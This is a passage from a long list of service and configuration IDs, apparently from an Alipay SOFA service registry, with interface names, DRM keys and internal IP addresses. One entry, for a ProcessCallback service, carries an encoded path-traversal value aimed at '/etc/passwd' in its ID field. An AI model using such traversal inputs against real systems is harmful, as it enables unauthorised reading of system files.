vicesinspect_antProcessDeleteResultCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:127@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.SCodeToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.ProductIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:minishopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.zproxy.VerifyZpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OrderAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityAdvicePolicyService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finlinkdata.common.service.facade.requestorder.service.RequestLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.content.picture.service.PictureRecognitionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.Module:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.ItemOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.kyc.CertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.aclinkelib.common.service.facade.ComponentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.DeliveryBizConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChgRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.AllocateInstructionStatusPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.TaxProcessingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseMetaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.AssFacade:1.0:assFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.live.LiveManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.qa.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dataphin-dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.EteTestCoreCommonResource.equalsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.merchant.common.service.facade.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.spm.SpmIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.mng.facade.PermissionMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayOffineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.AptransUidLengthWhiteListDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.qa.isCloseQAAggregateDingQiProductCard,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpaybizcore.common.facade.plan.api.PlanCloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mshopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.WorkspaceDataQueryFacade:1.0:workspaceDataQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.ExitGroupRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fundapplication.common.service.facade.inner.newyearone.DynamicRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.bp.engine.service.BPJobService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_11_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.notWorkDayStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.yunfengdieweb:name=com.alipay.zcache.tbase.yfdwebTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderAnnualAuditQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetConsultDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.BenefitConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","bumng.BumngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.checkSerialGenerateDateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.communication.api.CommunicationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:cifCacheBindInfoLoad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:clearingcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_SF_DATA_MARKET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acrescore.facade.SupplierFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirecenter.service.facade.api.TmallPayInfoStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ContentLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.integration.einvoice.EinvoiceItemServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.cicada.user.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.ExclusiveCreditMsgAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.53.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.2.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csplatform.service.facade.api.QuestionRecordService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.ClvPubAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqsyncguard.facade.dag.D2ServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:order-submit-convert@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.paymentmng.SHAREDATADataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobiletms.common.service.facade.rpc.TemplateRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeRService:1.0:pcapplycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icif.service.facade.api.PrivilegeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OpenIdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:pullBlockSplitor_ar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:shopFallToLeadsRecordDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:memberexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwopen.t7701.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantservice.common.service.facade.api.AssistantChatSuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.notificationauth.NotificationAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderPriceModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.core.mail.SendMailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.TlouBizInfoConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.SaleDashboardOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:acctrans@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.config.api.PointConfigParamService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.BusinessConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.monitor.TairNameInfoFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.176.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.consumeprod.common.service.ebill.facade.EbillDouble11QueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.227.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetinsight.common.service.facade.api.FundEvaluationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxStores,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.admin.DownTopicAccessAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.golden.common.facade.charge.config.ChargeConfigureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdspaydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","ideploy@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerFacade:1.0:testUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.manage.subBudget.SubBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_T_ABCDEFG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kmi.common.service.facade.NewKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.BenefitConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.AlmMetaModelDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenTopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.stdtrustee.StdTrusteeCheckerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.unifiedasset.view.AssetUnifiedViewMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.BizRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.GroupChatWelcomeMsgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifePunishOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.AppBaseConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYSETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.defaultExecuteTimeoutInSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.eventsMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.messageWriteMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.waitersupport.facade.AuthorizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apacc.common.service.facade.ChannelEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.subcard.query.AssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SwitchCoreConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkEquityPackageMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.ldc.AppRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.AntWorkOrderManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkdeck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.operate.api.SpeechOperateOnlineFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLEARINGCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.access.OauthCodeServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finquotationcenter.common.service.facade.api.MinutesCandlestickManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtQuotaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.EntranceCodeManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.common.service.facade.money.RefundOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ifaatam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmmccore.dissent.service.facade.NegativeinfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.224.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.spcenter.facade.isvoperation.IsvOperationAuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcardcore.common.service.facade.mpcard.MPcardUnionFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.operator.LifeOperatorCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:resultwrap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.service.facade.relation.phase.RelationPhaseManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.queryTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:portrait@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisServSceneRelaMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.RollbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.AssistCloudAtlasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zeldatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.c2c.order.UserOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PortalGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.client.seal.oss.OssClientService:1.0:yourOss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@riskinsight#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.routeclient.interfacename:punishcenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-criskcenter-taskMsg#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.imif.common.service.facade.v2.ContactPersonManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tradequery.common.service.facade.TradeapBaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.account.service.FinsignAccountQueryFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:trainInfoDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.rule.RuleEventManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_FRDECISION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinsight.service.api.metadata.MetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CUSTOMSCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iprocess.sip.action.Action:1.0:selfHelpTaskRelievePunishmentAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.180.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.194.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcenter.common.service.facade.NotificationSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antfeatureflow:name=com.alipay.antfeaturelib.core.feature.drm.AntFeatureConfigResource.publishCommand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:mobilemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamTenantApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.file.InstReCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbpm.common.service.facade.bcm.BPQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.BizDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.sign.EcontractSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.CommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.UserComplainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EntityEoiPoolMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.task.KbTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampConsumeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.kujuta.facade.EventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.settlement.biz.shared.schedule.retry.RetryTaskExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsFcProductConfig4MngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.ModelViewQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdProspectManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.154.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.141.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditint.facade.service.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.OverseaCertifyInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleDtbAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm